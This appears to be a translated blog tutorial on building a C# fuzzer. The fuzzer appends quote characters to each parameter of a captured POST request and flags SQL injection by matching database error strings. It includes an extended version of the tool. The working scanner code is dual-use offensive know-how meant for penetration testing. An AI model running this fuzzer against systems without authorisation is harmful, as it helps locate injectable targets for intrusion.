Fuzzing POST requests

Preparation

First, use Burp Suite to capture the request that the shopping cart sends: tick the product you want, then click "Add to cart".
[screenshot]
The captured request is shown below. The cartitem parameter looks like a possible SQL injection point: the back end processes its value, so we can taint this parameter with a value that breaks the database query and watch how the database reacts.

Then copy the captured request and save it as request.txt in the same directory as the compiled exe.
[screenshot]

Code

Before running the fuzzer, Main() must first set up the required parameters. I have explained how most of the code works in the code comments; readers who do not understand something can message me or leave a comment.

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace POST模糊测试
{
    class Program
    {
        static void Main(string[] args)
        {
            // We don't use ReadAllText() because we need to split the request into lines
            // to pull information out of it before fuzzing
            string[] requestLines = File.ReadAllLines(args[0]);
            // The last line of the saved request is the POST body: name=value pairs joined by '&'
            string[] parms = requestLines[requestLines.Length - 1].Split('&');
            string host = string.Empty;
            StringBuilder requestBuilder = new StringBuilder();

            foreach (string ln in requestLines)
            {
                // If the line starts with 'Host:', the second half of the line is the target host
                if (ln.StartsWith("Host:"))
                {
                    // Replace() strips any stray '\r' that might be left over; an IP address never contains one
                    host = ln.Split(' ')[1].Replace("\r", string.Empty);
                }
                requestBuilder.Append(ln + "\n");
            }
            string request = requestBuilder.ToString() + "\r\n";
            Console.WriteLine(request);

            /*
             Create an IPEndPoint from a new IPAddress object and port 80.
             IPAddress.Parse() accepts only a literal IP address, so the Host header in the
             saved request must be an IP, not a hostname.
             */
            IPEndPoint rhost = new IPEndPoint(IPAddress.Parse(host), 80);
        }
    }
}

Add the following foreach loop to Main(), after the line that creates rhost:

            foreach (string parm in parms)
            {
                /*
                 1. Each iteration creates a new Socket connected to the server
                 2. AddressFamily.InterNetwork tells the socket to use IPv4
                 3. SocketType.Stream asks for a stream socket (stateful, bidirectional, reliable)
                 4. ProtocolType.Tcp sets the socket's protocol to TCP
                 */
                using (Socket sock = new Socket(AddressFamily.InterNetwork,
                    SocketType.Stream, ProtocolType.Tcp))
                {
                    sock.Connect(rhost);

                    string val = parm.Split('=')[1];
                    // Replace() on the request string swaps the original value for a tainted one.
                    // Every occurrence of "=val" is replaced, so two parameters sharing a value are tainted together.
                    string req = request.Replace("=" + val, "=" + val + "'");
                    // The tainted body is one byte longer, so Content-Length must grow by one as well;
                    // otherwise the server reads the declared length and cuts the body short.
                    req = System.Text.RegularExpressions.Regex.Replace(req, @"Content-Length: (\d+)",
                        m => "Content-Length: " + (int.Parse(m.Groups[1].Value) + 1));

                    // Get the request as a byte array and send it
                    byte[] reqBytes = Encoding.ASCII.GetBytes(req);
                    sock.Send(reqBytes);

                    // Buffer sized to the socket's receive buffer; a single Receive() may
                    // return only the first part of the response
                    byte[] buf = new byte[sock.ReceiveBufferSize];
                    sock.Receive(buf);
                    string response = Encoding.ASCII.GetString(buf);    // decode the server's response

                    if (response.Contains("error in your SQL syntax"))
                    {
                        Console.WriteLine("Parameter " + parm + " seems vulnerable");
                        Console.WriteLine(" to SQL injection with value: " + val + "'");
                    }
                }
            }

The output of a run is shown in the screenshot below.
[screenshot]
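The following is an added example, not code from the original post or from the book it follows. It extends the loop above in the ways a practitioner usually needs: each request is rebuilt per parameter with a recomputed Content-Length and CRLF line endings, both a raw and a URL-encoded quote are tried, the whole response is read instead of a single Receive(), the Host header may be a DNS name, and the response is matched against error strings from several database engines. The class name PostFuzz, the sample request (host 192.168.1.75, path /cart/add, parameters quantity and submit) and the signature table are assumptions; only cartitem comes from the post.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Net.Sockets;
using System.Text;
using System.Text.RegularExpressions;

class PostFuzz
{
    // Constructed sample in the format Burp saves; host, path and parameter names are assumptions
    const string SampleRequest =
        "POST /cart/add HTTP/1.1\r\n" +
        "Host: 192.168.1.75\r\n" +
        "Content-Type: application/x-www-form-urlencoded\r\n" +
        "Content-Length: 32\r\n\r\n" +
        "cartitem=3&quantity=1&submit=Add";

    // Error fragments common engines emit when a stray quote breaks a query
    static readonly Dictionary<string, string> Signatures = new Dictionary<string, string>
    {
        { "MySQL",      "error in your SQL syntax" },
        { "PostgreSQL", "unterminated quoted string" },
        { "MSSQL",      "Unclosed quotation mark" },
    };

    // Split a raw request into header block and body at the first blank line
    public static (string Headers, string Body) Split(string raw)
    {
        string norm = raw.Replace("\r\n", "\n");
        int idx = norm.IndexOf("\n\n", StringComparison.Ordinal);
        if (idx < 0) throw new ArgumentException("no blank line before the body");
        return (norm.Substring(0, idx), norm.Substring(idx + 2).TrimEnd('\r', '\n'));
    }

    // One request per parameter, payload appended to that parameter only, Content-Length recomputed
    public static List<(string Param, string Request)> Taint(string raw, string payload)
    {
        var (headers, body) = Split(raw);
        var result = new List<(string, string)>();
        string[] parms = body.Split('&');
        for (int i = 0; i < parms.Length; i++)
        {
            string[] copy = (string[])parms.Clone();
            int eq = copy[i].IndexOf('=');
            string name = eq < 0 ? copy[i] : copy[i].Substring(0, eq);
            copy[i] = eq < 0 ? copy[i] + "=" + payload : copy[i] + payload;
            string newBody = string.Join("&", copy);
            string newHeaders = Regex.Replace(headers, @"(?im)^Content-Length:\s*\d+",
                "Content-Length: " + Encoding.ASCII.GetByteCount(newBody));
            if (!Regex.IsMatch(newHeaders, @"(?im)^Connection:"))
                newHeaders += "\nConnection: close";   // lets Send() read until EOF
            result.Add((name, newHeaders.Replace("\n", "\r\n") + "\r\n\r\n" + newBody));
        }
        return result;
    }

    // Host header without a ":port" suffix; TcpClient resolves DNS names, which IPAddress.Parse() cannot
    public static string HostOf(string raw)
    {
        Match m = Regex.Match(raw, @"(?im)^Host:\s*([^\s:]+)");
        if (!m.Success) throw new ArgumentException("no Host header");
        return m.Groups[1].Value;
    }

    // Send one request and read until the server closes the connection
    static string Send(string host, int port, string request)
    {
        using (var client = new TcpClient(host, port) { ReceiveTimeout = 5000 })
        using (NetworkStream ns = client.GetStream())
        using (var ms = new MemoryStream())
        {
            byte[] req = Encoding.ASCII.GetBytes(request);
            ns.Write(req, 0, req.Length);
            ns.CopyTo(ms);   // IOException after the timeout if the server keeps the connection open
            return Encoding.ASCII.GetString(ms.ToArray());
        }
    }

    // Name of the engine whose error text appears in the response, or null
    public static string Classify(string response)
    {
        foreach (var kv in Signatures)
            if (response.Contains(kv.Value)) return kv.Key;
        return null;
    }

    // No arguments: print the requests built from the sample. With a saved request file (and optional port): send them
    static void Main(string[] args)
    {
        bool live = args.Length > 0;
        string raw = live ? File.ReadAllText(args[0]) : SampleRequest;
        int port = args.Length > 1 ? int.Parse(args[1]) : 80;
        foreach (string payload in new[] { "'", "%27" })   // raw and URL-encoded quote
            foreach (var (param, request) in Taint(raw, payload))
            {
                if (!live) { Console.WriteLine(request + "\n----"); continue; }
                string dbms = Classify(Send(HostOf(raw), port, request));
                if (dbms != null) Console.WriteLine($"{param}: {dbms} error with payload {payload}, likely injectable");
            }
    }
}
```

Run it with no arguments to see the six requests built from the sample (three parameters times two payloads), each with a Content-Length that matches its tainted body; run it as `PostFuzz request.txt [port]` to send them. Reading to end-of-stream relies on the server honouring Connection: close, which the code adds when the saved request lacks it; a server that keeps the connection open will raise an IOException after the five-second receive timeout instead of hanging.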

Origin blog.csdn.net/weixin_45007073/article/details/114385413